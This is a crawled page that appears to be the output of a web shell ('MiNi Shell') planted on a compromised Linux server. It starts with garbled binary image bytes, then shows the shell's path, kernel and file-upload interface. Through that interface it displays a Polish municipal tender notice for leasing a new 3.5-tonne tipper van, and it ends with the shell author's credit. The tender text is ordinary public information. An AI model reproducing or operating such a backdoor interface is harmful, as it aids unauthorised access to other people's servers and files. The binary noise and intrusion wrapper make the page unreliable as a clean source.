JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221110/0043475701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i zakup w formie leasingu operacyjnego fabrycznie nowego samochodu dostawczego o dopuszczalnej masie całkowitej do 3,5 ton z wywrotką 3-stronną </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSIĘBIORSTWO GOSPODARKI KOMUNALNEJ W POŁAŃCU SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830337375</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Krakowska 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Połaniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 158650540</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 15 8650540 wew.23</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pgk-polaniec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pgk-polaniec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający sektorowy - art. 5 ust. 1 pkt 1 - gospodarka wodna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Odprowadzanie i oczyszczanie ścieków </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i zakup w formie leasingu operacyjnego fabrycznie nowego samochodu dostawczego o dopuszczalnej masie całkowitej do 3,5 ton z wywrotką 3-stronną </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ace536e0-60ea-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00434757</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pgkpolaniec.bip.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/, https://epuap.gov.pl/wps/portal/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z dokumentami zamówienia (SWZ)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z dokumentami zamówienia (SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z dokumentami zamówienia (SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PGK/1/TZ/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 209697,84 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia:<br/>1)	Samochód fabrycznie nowy, kompletny, sprawny technicznie, gotowy do eksploatacji, bez zastawu, bez obciążeń, wolny od wad prawnych i fizycznych (konstrukcyjnych, materiałowych, wykonawczych),<br/>2)	Rok produkcji: 2022,<br/>3)	Kolor kabiny nadwozia: do uzgodnienia z Zamawiającym,<br/>4)	Pojazd przystosowany do ruchu prawostronnego,<br/>5)	Dopuszczalna masa całkowita: do 3,5 t,<br/>6)	Silnik wysokoprężny,<br/>7)	Pojemność silnika: 2000 - 2700 cm3,<br/>8)	Moc silnika: min. 140 KM,<br/>9)	Skrzynia biegów manualna min 5-biegowa,<br/>10)	Norma emisji spalin: Euro 6,<br/>11)	Nadwozie: kabina 3-osobowa z zabudową typu wywrotka 3–stronna,<br/>12)	Homologacja ciężarowa,<br/>13)	Ilość drzwi: 2,<br/>14)	Parametry skrzyni wywrotki:<br/>Długość (wew.): 4m (plus/minus 20 cm),<br/>Szerokość (wew.): 2,1 m (plus/minus 10 cm),<br/>Burty stałe, otwierane o wys. 40 cm <br/>Ładowność: min. 1000 kg,<br/>Osłona ochronna kabiny,<br/>15)	Osłony antynajazdowe aluminiowe,<br/>16)	Pasy bezpieczeństwa 3 punktowe,<br/>17)	Ogrzewanie kabiny pasażerskiej,<br/>18)	Klimatyzacja min. Manualna,<br/>19)	Kolumna kierownicza regulowana w dwóch płaszczyznach (na wysokość <br/>i głębokość)<br/>20)	Fotel kierowcy z regulacją wysokości,<br/>21)	ABS,<br/>22)	Układ kontroli trakcji i stabilizacji toru jazdy, Immobiliser,<br/>23)	Centralny zamek sterowany pilotem (2 szt.),<br/>24)	Wspomaganie układu kierowniczego,<br/>25)	Poduszka powietrzna kierowcy i pasażerów,<br/>26)	Przednie światła przeciwmgielne,<br/>27)	Światła do jazdy dziennej LED,<br/>28)	Gniazdo 12 V w kabinie kierowcy,<br/>29)	Szyby regulowane elektrycznie,<br/>30)	Lusterka zewnętrzne sterowane elektrycznie i podgrzewane,<br/>31)	Fabryczne radio cyfrowe z zestawem głośnomówiącym z Bluetooth,<br/>32)	Komplet kół zimowych i letnich,<br/>33)	Osłony przeciwbłotne tylne,<br/>34)	Dywaniki gumowe,<br/>35)	Tapicerka materiałowa, w ciemnym kolorze,<br/>36)	Koło zapasowe pełnowymiarowe,<br/>37)	Trójkąt ostrzegawczy,<br/>38)	Gaśnica proszkowa,<br/>39)	Apteczka,<br/>40)	Zestaw podstawowych narzędzi (podnośnik i klucz do kół).<br/>2.	Wymagane dokumenty jakie będzie zobowiązany dostarczyć Wykonawca<br/>wraz z przedmiotem zamówienia:<br/>1)Faktura sprzedaży kompletnego pojazdu. Instrukcja obsługi, eksploatacji i konserwacji (w języku polskim)- 2 egzemplarze.<br/>2) Książkę serwisową i gwarancyjną samochodu.<br/>3) Homologację ciężarowa.<br/>4)Dokumenty potwierdzające zgodność przedmiotu zamówienia z normami dopuszczającymi przedmiot zamówienia do obrotu.<br/>5) Dokumenty niezbędne do rejestracji i ubezpieczenia samochodu.<br/>6) Inne dokumenty przewidziane w przepisach prawa.<br/>3.	Warunki dodatkowe:<br/>1)	Dostarczony przez Wykonawcę pojazd musi mieć możliwość zamontowania (bez utraty gwarancji) stosowanego u Zamawiającego systemu monitorowania pojazdu – GPS. Dostarczony przez Wykonawcę pojazd musi mieć możliwość zamontowania (bez utraty gwarancji) stosowanego u Zamawiającego systemu monitorowania zużycia paliwa.<br/>2)	Zamawiający zastrzega możliwość zamontowania podwyższenia burt wywrotki samochodu (bez utraty gwarancji)<br/>3)	Koszty dostarczenia nowego pojazdu do siedziby Zamawiającego.<br/>4)	Samochód musi posiadać homologację wystawioną zgodnie z zapisami ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym, umożliwiającą zgodne z obowiązującymi przepisami dopuszczenie pojazdu do ruchu.<br/>5)	Samochód stanowiący przedmiot zamówienia musi spełniać warunki techniczne przewidziane przez obowiązujące w Polsce oraz Unii Europejskiej przepisy prawne dla samochodów dostawczych o dopuszczalnej masie całkowitej do 3,5t, poruszających się po drogach publicznych.<br/>6)	Wykonawca w dniu odbioru musi przeszkolić czterech pracowników Zamawiającego w zakresie prawidłowej eksploatacji i obsługi kompletnego pojazdu oraz wystawić zaświadczenia o ukończeniu przeszkolenia.<br/>7)	Wykonawca w trakcie trwania gwarancji w terminie uzgodnionym z Zamawiającym musi przeszkolić czterech pracowników Zamawiającego w zakresie diagnostyki i napraw pogwarancyjnych całego pojazdu oraz dostarczyć potrzebną dokumentację serwisową w zakresie diagnostyki i napraw jak również wystawić zaświadczenia <br/>o ukończeniu przeszkolenia.<br/>4.	Warunki gwarancji i serwisu:<br/>1)	Gwarancja:<br/>a.	Wykonawca zapewni udzielenie rękojmi oraz pełnej gwarancji na cały przedmiot zamówienia (tj podzespoły mechaniczne, elektryczne, elektroniczne, hydrauliczne oraz zabudowę) na okres : minimum 2 lat, bez limitu kilometrów.<br/>b.	Wykonawca zapewni gwarancję na lakier: minimum 3 lata.<br/>c.	Wykonawca zapewni gwarancję na perforację: minimum 10 lat.<br/>2)	Okres gwarancji biegnie od dnia protokolarnego przekazania Zamawiającemu przedmiotu zamówienia.<br/>3)	Uprawnienia z tytułu rękojmi za wady przedmiotu zamówienia przysługują Zamawiającemu niezależnie od uprawnień z tytułu gwarancji, przy czym okres rękojmi zrównany zostaje z okresem gwarancji. Wszelkie odmienne postanowienia wynikające <br/>z kart gwarancyjnych uważa się za bezskuteczne.<br/>4)	Zmawiający wymaga dostępności autoryzowanego punktu naprawczego – serwisu w promieniu maksymalnie 250 km od siedziby Zamawiającego. W sytuacji, gdy pojazd zostanie unieruchomiony w skutek awarii, koszt transportu do autoryzowanego punktu naprawczego – serwisu poniesie Wykonawca.<br/>Uwaga! Do oferty Wykonawca zobowiązany załączyć jest wykaz punktów naprawczych serwisów – w zakresie podwozia i zabudowy.<br/>5)	Gwarancja obejmuje:<br/>a.	przeglądy gwarancyjne zapewniające bezusterkową eksploatację w okresie udzielonej gwarancji,<br/>b.	koszt przeglądów gwarancyjnych ponosi Wykonawca (naprawy wraz <br/>z ewentualnym transportem, dojazdami, robocizną, wymiany części zamiennych wyłącznie na fabrycznie nowe, wymiany części eksploatacyjnych, olejów oraz filtrów),<br/>c.	usuwanie wszelkich wad i usterek ujawnionych w okresie gwarancji,<br/>d.	czas wykonania przeglądu w okresie gwarancyjnym, wynosi do dwóch dni roboczych,<br/>e.	czas fizycznej reakcji serwisu (tj. przyjazd na miejsce awarii i rozpoczęcia usuwania awarii) do 48 godzin od godziny zgłoszenia awarii w dni robocze, <br/>w przypadku zgłoszenia awarii w dni wolne od pracy lub sobotę termin biegnie od pierwszej godziny najbliższego dnia roboczego,<br/>f.	czas związany z usunięciem awarii wynosi maksymalnie do 7 dni roboczych od dnia zgłoszenia awarii,<br/>g.	w przypadku przedłużenia czasu usunięcia awarii powodującej wyłączenie przedmiotu zamówienia z użytkowania ponad okresy wymienione powyżej /7 dni roboczych/, Wykonawca zobowiązany jest do dostarczenia na własny koszt pojazdu zastępczego o parametrach nie gorszych niż przedmiot zamówienia, do czasu usunięcia awarii przez serwis Wykonawcy i zwrotu Zamawiającemu przedmiotu zamówienia,<br/>h.	okres gwarancji przedłuża się każdorazowo o liczbę dni niesprawności przedmiotu umowy spowodowanej awarią i czasem naprawy /od daty zgłoszenia awarii do daty zwrotu przedmiotu zamówienia do Zamawiającego/, <br/>i.	w okresie gwarancji koszt dojazdu serwisu oraz transport przedmiotu zamówienia do punktu serwisowego ponosi Wykonawca. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34130000-7 - Pojazdy silnikowe do transportu towarów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. IV SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o niepodleganiu wykluczeniu, stanowiące załącznik nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załącznik nr 6 do SWZ– oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustaw<br/>Załącznik nr 7 do SWZ– oświadczenie uwzględniające przesłanki wykluczenia z art. 7 ust.1 ustawy <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania agresji na Ukrainie oraz służących ochronie bezpieczeństwa narodowego <br/>Załącznik nr 7 A do SWZ- Oświadczenia wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia uwzględniające przesłanki wykluczenia z art. 7 ust.1 ustawy <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania agresji na Ukrainie oraz służących ochronie bezpieczeństwa narodowego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 60 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com